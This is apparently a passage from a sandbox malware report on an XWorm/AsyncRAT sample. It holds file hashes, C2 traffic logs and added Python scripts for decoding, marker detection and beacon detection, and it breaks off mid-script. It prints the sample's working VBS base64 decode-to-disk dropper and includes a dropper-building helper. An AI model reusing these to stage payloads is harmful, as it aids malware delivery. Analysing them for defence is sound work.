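The batch file dropped by x.exe and the %tmp%\x text file it produces (both previewed above) are the two halves of a Bat2Exe-style dropper: each echo line writes one 70-character base64 chunk, the first with > to create the file and the rest with >> to append, and a later stage decodes the result into the PE that cscript.exe drops. The script below is an added example, not code from the report or from Bat2Exe, that replays those echo lines offline, reassembles every redirect target, base64-decodes it and checks for an MZ/PE header. The batch it parses is built from a constructed 128-byte PE header skeleton rather than the real payload; pointed at the dropped batch file's text it produces the same bytes cscript.exe would have decoded, so their SHA-256 can be compared with the dropped-file table without executing anything.

```python
"""Replay a Bat2Exe-style batch dropper offline and validate its payload."""
import base64
import hashlib
import re

# Matches ``echo <chunk>>%tmp%\x`` and ``echo <chunk>>>%tmp%\x`` (no space
# before the redirect, as in the dropper). ``>>`` is tried before ``>``.
ECHO_RE = re.compile(
    r"^\s*echo\s+(?P<payload>\S+?)(?P<op>>>|>)(?P<target>\S+)\s*$",
    re.IGNORECASE,
)


def looks_like_pe(blob: bytes) -> bool:
    """True when blob has a DOS 'MZ' stub and 'PE\\0\\0' at e_lfanew."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def sha256_hex(blob: bytes) -> str:
    return hashlib.sha256(blob).hexdigest()


def reconstruct(batch_text: str) -> dict:
    """Replay the echo redirects and decode each target file.

    Also lists echo lines whose chunk ends in a digit: cmd.exe treats a
    digit written directly before '>' as a file-handle number, so such a
    line would lose its last character when actually run. They are
    reported for manual checking rather than silently emulated.
    """
    files = {}
    ambiguous = []
    for lineno, line in enumerate(batch_text.splitlines(), start=1):
        m = ECHO_RE.match(line)
        if not m:
            continue
        target = m["target"].lower()          # cmd paths are case-insensitive
        chunk = m["payload"]
        if chunk[-1].isdigit():
            ambiguous.append(lineno)
        if m["op"] == ">":                    # '>' truncates, '>>' appends
            files[target] = [chunk]
        else:
            files.setdefault(target, []).append(chunk)

    results = {}
    for target, chunks in files.items():
        text = "".join(chunks)
        try:
            blob = base64.b64decode(text, validate=True)
        except ValueError:                    # binascii.Error is a ValueError
            blob = b""
        results[target] = {
            "echo_lines": len(chunks),
            "base64_chars": len(text),
            "decoded": blob,
            "size": len(blob),
            "sha256": sha256_hex(blob) if blob else None,
            "pe": looks_like_pe(blob),
        }
    return {"files": results, "ambiguous_lines": ambiguous}


def constructed_pe_stub() -> bytes:
    """A 128-byte MZ/PE header skeleton (constructed, not the real payload)."""
    stub = bytearray(0x80)
    stub[0:2] = b"MZ"
    stub[0x3C:0x40] = (0x40).to_bytes(4, "little")   # e_lfanew -> 0x40
    stub[0x40:0x44] = b"PE\x00\x00"
    stub[0x44:0x46] = (0x14C).to_bytes(2, "little")  # IMAGE_FILE_MACHINE_I386
    return bytes(stub)


def build_dropper(blob: bytes, target: str = r"%tmp%\x", width: int = 70) -> str:
    """Emit a batch file in the same shape as the one dropped by x.exe."""
    b64 = base64.b64encode(blob).decode("ascii")
    lines = ["@echo off && title my men", "@Echo off"]
    for i in range(0, len(b64), width):
        op = ">" if i == 0 else ">>"
        lines.append(f"echo {b64[i:i + width]}{op}{target}")
    return "\r\n".join(lines) + "\r\n"


if __name__ == "__main__":
    report = reconstruct(build_dropper(constructed_pe_stub()))
    for target, info in report["files"].items():
        print(f"{target}: {info['echo_lines']} echo lines, {info['size']} bytes, "
              f"pe={info['pe']}, sha256={info['sha256']}")
    print("lines needing manual check:", report["ambiguous_lines"])
```

Because the parser keys on the redirect target, a dropper that writes several files (or rewrites one with a second >) is handled the same way; the decoded PE is kept in memory so it can be hashed and inspected without ever landing on disk.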
                                          Process:C:\Windows\System32\cscript.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):210432
                                          Entropy (8bit):5.829643716053016
                                          Encrypted:false
                                          SSDEEP:3072:prm4sOjb48smI2WjbeYpX6Ou7atBBZ4uzDSEG2dCBVDtM5:pLsDbDpXKkZ4mSB2dCju
                                          MD5:74D8F5A1E068A454FFAA5C8FD32A3E44
                                          SHA1:46599D94EDC83E67E6BDE3579F61028E2BEE7096
                                          SHA-256:59B203FCF387BFDE09A17D954C9281F5743B0D0EDB9C8D1FC481EB0165416FD0
                                          SHA-512:6D5E8AEB8A5139F31B0F8ED55655C0EB52B3E2589CF1E6EE3C13B06394CEBA72DA0DC5E01972386BD75B01D17C16E00D50FE2C1E3A2C4B2A5A6B70B0A753EC3D
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: Joe Security
                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: ditekSHen
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 74%
                                          • Antivirus: Virustotal, Detection: 77%, Browse
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e.....................(......~*... ...@....@.. ....................................@.................................$*..W....@..^$........................................................................... ............... ..H............text........ ...................... ..`.rsrc...^$...@...&..................@..@.reloc...............4..............@..B................`*......H.......t^..........&.....................................................(....*.r...p*. .s..*..(....*.r%..p*. .:..*.s.........s.........s.........s.........*.rI..p*. ....*.rm..p*. .8F.*.r...p*. m.`.*.r...p*. .p.*.r...p*. S...*..((...*.r...p*. .b..*.r3..p*. r...*.(*...-.(+...,.+.(,...,.+.()...,.+.((...,..(H...*"(....+.*&(....&+.*.+5sZ... .... .'..o[...(*...~....-.(\...(N...~....o\...&.-.*.r-..p*. *p{.*.rQ..p*. ~.H.*.r...p*. MX%.*.r...p*. .x!.*.r...p*. E/..*.r...p*. 4.R.*.rO.
                                          Process:C:\Windows\System32\cmd.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:modified
                                          Size (bytes):380
                                          Entropy (8bit):5.126074554208653
                                          Encrypted:false
                                          SSDEEP:6:jpz7yVHPxORKm6JgCPmu7jjs9lVHEr6Jxlw6mvHFAF1GjyH4BZIkv:NZOmG7jU2r6JAiTrYZnv
                                          MD5:EC9A2FB69A379D913A4E0A953CD3B97C
                                          SHA1:A0303ED9F787C042071A1286BBA43A5BBDD0679E
                                          SHA-256:CF8268D158BB819EF158FF6CCBED64D5E379148A0ADB1F73A082A01D56D0286B
                                          SHA-512:FEF8E24A680991046BD7DACD6079C7E48C3031FE46CAAE722EA93797EE16C052073BA97959E992EA71AC7AB72FBCEDAA5CF4A410657AAC4C10AD24DE6935E9D6
                                          Malicious:true
                                          Preview:Set f=CreateObject("Scripting.FileSystemObject")'v..Set p=f.GetSpecialFolder(2)'v..Set i=f.OpenTextFile(p+"\x",1)'v..c=i.ReadAll()'v..i.Close'v..Set x=CreateObject("Msxml2.DOMDocument")'v..Set o=x.CreateElement("base64")'v..o.dataType="bin.base64"'v..o.text=c'v..Set b=CreateObject("ADODB.Stream")'v..b.Type=1'v..b.Open'v..b.Write o.NodeTypedValue'v..b.SaveToFile p+"\x.exe",2'v..
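The script above is the whole decode-to-disk stage of the chain: it reads the base64 text dropped as `%TEMP%\x` (GetSpecialFolder(2) is the Temp folder), turns it into bytes through an MSXML element with dataType "bin.base64", and writes those bytes with a binary ADODB.Stream (Type=1) to `%TEMP%\x.exe`, overwriting any existing file (SaveToFile mode 2). The report's preview of the `x` blob starts with the base64 of a standard MZ/PE header, which is what cscript.exe is then recorded as dropping. The following Python is an added triage example, not code from the Joe Sandbox report or from the sample: it flags the four script markers that make up the pattern, decodes the blob the way MSXML and ADODB would (whitespace between lines is ignored), and parses the resulting PE header. The script text and the base64 input are constructed from the previews shown in this report; the first four base64 lines are used, so only the DOS header, COFF header and the first optional-header fields are checked.

```python
"""Triage helper for the VBS decode-to-disk dropper shown above (added example, not part of
the Joe Sandbox report): flag the Msxml2/ADODB base64-to-file pattern in script text, then
decode the blob exactly as MSXML and ADODB.Stream would and sanity-check the PE header."""
import base64
import re
import struct

# Constructed from the report's preview of the dropped VBS (Joe Sandbox renders CRLF as "..").
VBS_DROPPER = r"""Set f=CreateObject("Scripting.FileSystemObject")'v
Set p=f.GetSpecialFolder(2)'v
Set i=f.OpenTextFile(p+"\x",1)'v
c=i.ReadAll()'v
i.Close'v
Set x=CreateObject("Msxml2.DOMDocument")'v
Set o=x.CreateElement("base64")'v
o.dataType="bin.base64"'v
o.text=c'v
Set b=CreateObject("ADODB.Stream")'v
b.Type=1'v
b.Open'v
b.Write o.NodeTypedValue'v
b.SaveToFile p+"\x.exe",2'v
"""

# Constructed from the first four lines of the report's preview of the dropped "%TEMP%\x" blob.
B64_BLOB = (
    "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n"
    "AAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g\r\n"
    "aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAI7a9GUAAAAAAAAAAOAAAgELAQsAAA\r\n"
    "wBAAAoAgAAAAAAfioBAAAgAAAAQAEAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACg\r\n"
)

# The four building blocks of the technique: read from %TEMP% (GetSpecialFolder(2)),
# decode via an MSXML bin.base64 element, write binary through ADODB.Stream, save to disk.
DROPPER_MARKERS = {
    "temp_folder": re.compile(r"GetSpecialFolder\(\s*2\s*\)", re.I),
    "msxml_b64": re.compile(r'dataType\s*=\s*"bin\.base64"', re.I),
    "adodb_stream": re.compile(r'CreateObject\("ADODB\.Stream"\)', re.I),
    "save_to_file": re.compile(r"\.SaveToFile\b", re.I),
}


def dropper_markers(script_text):
    """Return the marker names found; all four together is the full decode-to-disk chain."""
    return {name for name, rx in DROPPER_MARKERS.items() if rx.search(script_text)}


def decode_like_msxml(text):
    """MSXML's bin.base64 dataType skips whitespace, so the line-wrapped file is one stream."""
    return base64.b64decode("".join(text.split()), validate=True)


def parse_pe_header(data):
    """Parse the DOS header, COFF file header and the first PE32 optional-header fields.
    Raises ValueError when the bytes are not a PE32 image or are too short to check."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, sections, timestamp, _symtab, _nsyms, opt_size, chars = struct.unpack_from(
        "<HHIIIHH", data, coff)
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic != 0x10B:
        raise ValueError("not a PE32 optional header")
    (entry_point,) = struct.unpack_from("<I", data, opt + 16)
    (image_base,) = struct.unpack_from("<I", data, opt + 28)
    return {
        "e_lfanew": e_lfanew, "machine": machine, "sections": sections,
        "timestamp": timestamp, "optional_header_size": opt_size, "characteristics": chars,
        "magic": magic, "entry_point": entry_point, "image_base": image_base,
    }


if __name__ == "__main__":
    print(sorted(dropper_markers(VBS_DROPPER)))
    hdr = parse_pe_header(decode_like_msxml(B64_BLOB))
    print({k: hex(v) for k, v in hdr.items()})
```

On the four preview lines the decoded bytes give e_lfanew 0x80, machine 0x14c (i386), three sections, characteristics 0x0102 (EXECUTABLE_IMAGE, 32BIT_MACHINE), entry point RVA 0x12a7e and image base 0x400000, which agrees with the report's description of the dropped `x.exe` as a PE32 .NET assembly. The marker check is deliberately loose (case-insensitive, whitespace-tolerant) because the same four calls survive most renaming of the script's variables.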
                                          Process:C:\Users\user\AppData\Local\Temp\x.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Sep 5 08:15:11 2024, mtime=Thu Sep 5 08:15:11 2024, atime=Thu Sep 5 08:15:11 2024, length=210432, window=hide
                                          Category:dropped
                                          Size (bytes):690
                                          Entropy (8bit):4.650657845385358
                                          Encrypted:false
                                          SSDEEP:12:829Y9M/CIcPUgceGQ0zKidezvjAuVvIRgbKpE85mV:829Y9M/Nf1KiWAuUUqpm
                                          MD5:E93EE9204F19965D23C3FDA2DA7E2181
                                          SHA1:4A3A42EECB2378BEFB74F6F6ACC4CDCC8BF064D6
                                          SHA-256:080149A6F31CA8CDD485F695CEDADFB728F2B290694871842D28A0934FFEAF4B
                                          SHA-512:EE2A6088E2C103CC9684A2A7C2AD78EB317999F69B2ABC7FE9DD36C96C4B2CC696A5F9FA46B7969E3A93DA09BE3BDB302177832338F038764115FFC2F9E34FEB
                                          Malicious:false
                                          Preview:L..................F.... ...b>.t....b>.t....b>.t....6...........................P.O. .:i.....+00.../C:\...................`.1.....%Y.I. PROGRA~3..H......O.I%Y.I....g.....................g...P.r.o.g.r.a.m.D.a.t.a.....n.2..6..%Y.I HOODBY~1.EXE..R......%Y.I%Y.I...........................-=.H.o.o.d.b.y.u.n.l.o.c.k...e.x.e.......N...............-.......M....................C:\ProgramData\Hoodbyunlock.exe..7.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.H.o.o.d.b.y.u.n.l.o.c.k...e.x.e.`.......X.......216041...........hT..CrF.f4... ..2=.b...,...W..hT..CrF.f4... ..2=.b...,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                          Process:C:\Windows\System32\WerFault.exe
                                          File Type:MS Windows registry file, NT/2000 or above
                                          Category:dropped
                                          Size (bytes):1835008
                                          Entropy (8bit):4.421689824762361
                                          Encrypted:false
                                          SSDEEP:6144:QSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNh0uhiTwP:7vloTMW+EZMM6DFy/03wP
                                          MD5:F4F6659097B9B81D5C4151DD07A659E7
                                          SHA1:4C8965ADD732BFFD2C11C41899FB008F10DFD9F0
                                          SHA-256:5C184AA9CC72491CE3E869A819D3BB6003A27BC03C14EFCB599B2FA02E0C7C49
                                          SHA-512:F5DF103C11DDD60AF0D6A89089D17E6F0DCF69DB170A037ACDFF0A3E140A3D3C00D0FA21D3C6C75F13D00C291E37FA435B567AAB79590618AD9247E6E1B6C09E
                                          Malicious:false
                                          Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmvr.Nt................................................................................................................................................................................................................................................................................................................................................G.z........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):3.792773169116553
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          File name:x.exe
                                          File size:695'808 bytes
                                          MD5:98a2d7aee74efe11a83e1514199a1346
                                          SHA1:758365522b6a9eebe7ec5a10f4f260d3ffcd285a
                                          SHA256:0e079477b2c5072f876fabdd5339ce96ed42a55361fb445d1c9bbe1282bf4850
                                          SHA512:3f0c83af88c1f2b067ad56d458719cc1641a6aa672eea68adb0adc6dd25f7306dc9b8e018021828f61d514d74437683671e23e9eb731d865007335ec403722b5
                                          SSDEEP:3072:gti/b34bfUYCZS6jBPbZ8L2SdoYBUBk1pfApjgrD1xJiS+F4Hsi2I/7X88eXrspS:P3ZS6jBPl8LDdSqIw
                                          TLSH:6AE4D22178EF6908E3117ADFABD4B4AF496DE56B193974BC3071C30A6247C038CA577A
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(..f............................>.... ........@.. ....................................@................................
                                          Icon Hash:00928e8e8686b000
                                          Entrypoint:0x4ab33e
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows cui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x6604A528 [Wed Mar 27 23:00:56 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
(The bytes that follow the entry point are zero padding, which the disassembler renders as a long run of `add byte ptr [eax], al`; they are omitted here. The one real instruction is an indirect jump through the IAT entry at RVA 0x2000 (image base 0x400000 + 0x2000), whose only import is mscoree.dll!_CorExeMain: the standard native stub of a .NET executable, which hands control to the CLR.)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xab2f0 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xac000 | 0x4d8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xae000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xa9344 | 0xa9400 | a167d747e37c506f8d5a9cd6203f3465 | False | 0.2139941262001477 | data | 3.7915981418888647 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xac000 | 0x4d8 | 0x600 | f3cc4607c743900cdd6d8ed9b925f2f9 | False | 0.3723958333333333 | data | 3.701694837196674 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xae000 | 0xc | 0x200 | 8cc41125a56b2c09042334c7b8e63b2d | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xac0a0 | 0x244 | data | | | 0.4603448275862069
RT_MANIFEST | 0xac2e8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-05T11:15:25.670475+0200 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.5 | 49722 | 147.185.221.17 | 36301 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 5, 2024 11:15:11.360744953 CEST | 49720 | 80 | 192.168.2.5 | 208.95.112.1
Sep 5, 2024 11:15:11.367610931 CEST | 80 | 49720 | 208.95.112.1 | 192.168.2.5
Sep 5, 2024 11:15:11.367744923 CEST | 49720 | 80 | 192.168.2.5 | 208.95.112.1
Sep 5, 2024 11:15:11.368690968 CEST | 49720 | 80 | 192.168.2.5 | 208.95.112.1
Sep 5, 2024 11:15:11.374847889 CEST | 80 | 49720 | 208.95.112.1 | 192.168.2.5
Sep 5, 2024 11:15:11.835160017 CEST | 80 | 49720 | 208.95.112.1 | 192.168.2.5
Sep 5, 2024 11:15:11.884211063 CEST | 49720 | 80 | 192.168.2.5 | 208.95.112.1
Sep 5, 2024 11:15:15.310756922 CEST | 49722 | 36301 | 192.168.2.5 | 147.185.221.17
Sep 5, 2024 11:15:15.315581083 CEST | 36301 | 49722 | 147.185.221.17 | 192.168.2.5
Sep 5, 2024 11:15:15.315658092 CEST | 49722 | 36301 | 192.168.2.5 | 147.185.221.17
Sep 5, 2024 11:15:15.379422903 CEST | 49722 | 36301 | 192.168.2.5 | 147.185.221.17
Sep 5, 2024 11:15:15.385365963 CEST | 36301 | 49722 | 147.185.221.17 | 192.168.2.5
Sep 5, 2024 11:15:25.670475006 CEST | 49722 | 36301 | 192.168.2.5 | 147.185.221.17
Sep 5, 2024 11:15:25.675324917 CEST | 36301 | 49722 | 147.185.221.17 | 192.168.2.5
Sep 5, 2024 11:15:35.915802002 CEST | 49722 | 36301 | 192.168.2.5 | 147.185.221.17
Sep 5, 2024 11:15:35.920835972 CEST | 36301 | 49722 | 147.185.221.17 | 192.168.2.5
Sep 5, 2024 11:15:36.694504023 CEST | 36301 | 49722 | 147.185.221.17 | 192.168.2.5
Sep 5, 2024 11:15:36.694724083 CEST | 49722 | 36301 | 192.168.2.5 | 147.185.221.17
Sep 5, 2024 11:15:39.540582895 CEST | 49722 | 36301 | 192.168.2.5 | 147.185.221.17
Sep 5, 2024 11:15:39.545540094 CEST | 36301 | 49722 | 147.185.221.17 | 192.168.2.5
Sep 5, 2024 11:15:41.698240042 CEST | 49727 | 36301 | 192.168.2.5 | 147.185.221.17
Sep 5, 2024 11:15:41.703244925 CEST | 36301 | 49727 | 147.185.221.17 | 192.168.2.5
Sep 5, 2024 11:15:41.707319975 CEST | 49727 | 36301 | 192.168.2.5 | 147.185.221.17
Sep 5, 2024 11:15:41.747956991 CEST | 49727 | 36301 | 192.168.2.5 | 147.185.221.17
Sep 5, 2024 11:15:41.753640890 CEST | 36301 | 49727 | 147.185.221.17 | 192.168.2.5
Sep 5, 2024 11:15:52.415774107 CEST | 49727 | 36301 | 192.168.2.5 | 147.185.221.17
Sep 5, 2024 11:15:52.420690060 CEST | 36301 | 49727 | 147.185.221.17 | 192.168.2.5
Sep 5, 2024 11:15:53.359147072 CEST | 80 | 49720 | 208.95.112.1 | 192.168.2.5
Sep 5, 2024 11:15:53.359368086 CEST | 49720 | 80 | 192.168.2.5 | 208.95.112.1
Sep 5, 2024 11:16:03.085395098 CEST | 36301 | 49727 | 147.185.221.17 | 192.168.2.5
Sep 5, 2024 11:16:03.085580111 CEST | 49727 | 36301 | 192.168.2.5 | 147.185.221.17
Sep 5, 2024 11:16:04.712362051 CEST | 49727 | 36301 | 192.168.2.5 | 147.185.221.17
Sep 5, 2024 11:16:04.717314005 CEST | 36301 | 49727 | 147.185.221.17 | 192.168.2.5
Sep 5, 2024 11:16:06.808094978 CEST | 49730 | 36301 | 192.168.2.5 | 147.185.221.17
Sep 5, 2024 11:16:06.813039064 CEST | 36301 | 49730 | 147.185.221.17 | 192.168.2.5
Sep 5, 2024 11:16:06.813133001 CEST | 49730 | 36301 | 192.168.2.5 | 147.185.221.17
Sep 5, 2024 11:16:06.843569994 CEST | 49730 | 36301 | 192.168.2.5 | 147.185.221.17
Sep 5, 2024 11:16:06.849325895 CEST | 36301 | 49730 | 147.185.221.17 | 192.168.2.5
Sep 5, 2024 11:16:17.134391069 CEST | 49730 | 36301 | 192.168.2.5 | 147.185.221.17
Sep 5, 2024 11:16:17.140286922 CEST | 36301 | 49730 | 147.185.221.17 | 192.168.2.5
Sep 5, 2024 11:16:27.431644917 CEST | 49730 | 36301 | 192.168.2.5 | 147.185.221.17
Sep 5, 2024 11:16:27.436578035 CEST | 36301 | 49730 | 147.185.221.17 | 192.168.2.5
Sep 5, 2024 11:16:28.214593887 CEST | 36301 | 49730 | 147.185.221.17 | 192.168.2.5
Sep 5, 2024 11:16:28.214658976 CEST | 49730 | 36301 | 192.168.2.5 | 147.185.221.17
Sep 5, 2024 11:16:31.806051970 CEST | 49730 | 36301 | 192.168.2.5 | 147.185.221.17
Sep 5, 2024 11:16:31.809988022 CEST | 49731 | 36301 | 192.168.2.5 | 147.185.221.17
Sep 5, 2024 11:16:31.848332882 CEST | 36301 | 49730 | 147.185.221.17 | 192.168.2.5
Sep 5, 2024 11:16:31.848351955 CEST | 36301 | 49731 | 147.185.221.17 | 192.168.2.5
Sep 5, 2024 11:16:31.848449945 CEST | 49731 | 36301 | 192.168.2.5 | 147.185.221.17
Sep 5, 2024 11:16:32.021694899 CEST | 49731 | 36301 | 192.168.2.5 | 147.185.221.17
Sep 5, 2024 11:16:32.026544094 CEST | 36301 | 49731 | 147.185.221.17 | 192.168.2.5
Sep 5, 2024 11:16:32.670761108 CEST | 49731 | 36301 | 192.168.2.5 | 147.185.221.17
Sep 5, 2024 11:16:32.677856922 CEST | 36301 | 49731 | 147.185.221.17 | 192.168.2.5
Sep 5, 2024 11:16:34.025319099 CEST | 49731 | 36301 | 192.168.2.5 | 147.185.221.17
Sep 5, 2024 11:16:34.031172037 CEST | 36301 | 49731 | 147.185.221.17 | 192.168.2.5
Sep 5, 2024 11:16:36.009422064 CEST | 49731 | 36301 | 192.168.2.5 | 147.185.221.17
Sep 5, 2024 11:16:36.014486074 CEST | 36301 | 49731 | 147.185.221.17 | 192.168.2.5
Sep 5, 2024 11:16:44.171875000 CEST | 49720 | 80 | 192.168.2.5 | 208.95.112.1
Sep 5, 2024 11:16:44.172111034 CEST | 49731 | 36301 | 192.168.2.5 | 147.185.221.17
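The TCP rows above show the sample talking to 147.185.221.17:36301 over four successive connections (source ports 49722, 49727, 49730, 49731), and the Suricata hit labels the 11:15:25 packet on the first of them as an XWorm CnC ping. The following Python is an added detection example, not part of the Joe Sandbox report: it recovers that ~10 second keep-alive cadence from packet timestamps alone, treating all connections to the same destination as one channel so that the reconnects do not hide the period, and it leaves the one-off ip-api.com request on port 80 unflagged. The input is constructed from the client-to-server rows of the table above; the burst gap, tolerance and repeat threshold are tuning choices of this example.

```python
"""Beacon-cadence check over the TCP packet table above (added example, not part of the Joe
Sandbox report): group outbound packets per destination, collapse each exchange to one event,
cluster the inter-arrival gaps and report destinations whose dominant gap repeats."""
from collections import defaultdict
from statistics import median

# Constructed input: the client-to-server rows of the report's TCP table (Sep 5, 2024, CEST)
# as "time sport dport src dst". Server-to-client rows are left out; the code would skip them.
PACKETS = """\
11:15:11.360744953 49720 80 192.168.2.5 208.95.112.1
11:15:11.367744923 49720 80 192.168.2.5 208.95.112.1
11:15:11.368690968 49720 80 192.168.2.5 208.95.112.1
11:15:11.884211063 49720 80 192.168.2.5 208.95.112.1
11:15:15.310756922 49722 36301 192.168.2.5 147.185.221.17
11:15:15.315658092 49722 36301 192.168.2.5 147.185.221.17
11:15:15.379422903 49722 36301 192.168.2.5 147.185.221.17
11:15:25.670475006 49722 36301 192.168.2.5 147.185.221.17
11:15:35.915802002 49722 36301 192.168.2.5 147.185.221.17
11:15:36.694724083 49722 36301 192.168.2.5 147.185.221.17
11:15:39.540582895 49722 36301 192.168.2.5 147.185.221.17
11:15:41.698240042 49727 36301 192.168.2.5 147.185.221.17
11:15:41.707319975 49727 36301 192.168.2.5 147.185.221.17
11:15:41.747956991 49727 36301 192.168.2.5 147.185.221.17
11:15:52.415774107 49727 36301 192.168.2.5 147.185.221.17
11:15:53.359368086 49720 80 192.168.2.5 208.95.112.1
11:16:03.085580111 49727 36301 192.168.2.5 147.185.221.17
11:16:04.712362051 49727 36301 192.168.2.5 147.185.221.17
11:16:06.808094978 49730 36301 192.168.2.5 147.185.221.17
11:16:06.813133001 49730 36301 192.168.2.5 147.185.221.17
11:16:06.843569994 49730 36301 192.168.2.5 147.185.221.17
11:16:17.134391069 49730 36301 192.168.2.5 147.185.221.17
11:16:27.431644917 49730 36301 192.168.2.5 147.185.221.17
11:16:28.214658976 49730 36301 192.168.2.5 147.185.221.17
11:16:31.806051970 49730 36301 192.168.2.5 147.185.221.17
11:16:31.809988022 49731 36301 192.168.2.5 147.185.221.17
11:16:31.848449945 49731 36301 192.168.2.5 147.185.221.17
11:16:32.021694899 49731 36301 192.168.2.5 147.185.221.17
11:16:32.670761108 49731 36301 192.168.2.5 147.185.221.17
11:16:34.025319099 49731 36301 192.168.2.5 147.185.221.17
11:16:36.009422064 49731 36301 192.168.2.5 147.185.221.17
11:16:44.171875000 49720 80 192.168.2.5 208.95.112.1
11:16:44.172111034 49731 36301 192.168.2.5 147.185.221.17
"""

CLIENT = "192.168.2.5"
BURST_GAP = 1.0    # packets closer than this are one exchange (handshake, request, ack)
TOLERANCE = 1.0    # gaps within this many seconds of each other count as the same period
MIN_REPEATS = 3    # how many near-equal gaps before a destination is called a beacon


def seconds(ts):
    """'HH:MM:SS.fffffffff' -> float seconds since midnight (strptime rejects 9 fraction digits)."""
    h, m, s = ts.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


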